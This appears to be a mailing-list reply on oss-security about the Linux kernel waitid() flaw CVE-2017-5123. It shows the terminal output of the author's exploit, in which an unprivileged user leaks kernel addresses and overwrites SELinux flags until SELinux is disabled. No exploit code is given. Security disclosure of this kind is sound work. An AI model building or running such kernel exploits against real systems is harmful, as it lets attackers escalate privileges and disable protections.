Date: Wed, 25 Oct 2017 12:42:41 +0200
From: up201407890@...nos.dcc.fc.up.pt
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2017-5123 Linux kernel v4.13 waitid() not calling
	access_ok()

Hello,

I've written a quick exploit for that vulnerability.
Instead of using it for malicious purposes, I use it to actually
increase my systems security.

$ id
uid=1000
$ ./a.out
[+] Leak size=144 bytes
[+] Got kernel base: 0xffffffffb5200000
[+] Got selinux_enforcing: 0xffffffffb611cc90
[+] Got selinux_enabled: 0xffffffffb5eb1350
[+] Overwriting selinux_enforcing...
[+] Overwriting selinux_enabled...
[+] SELinux disabled!

Enjoy,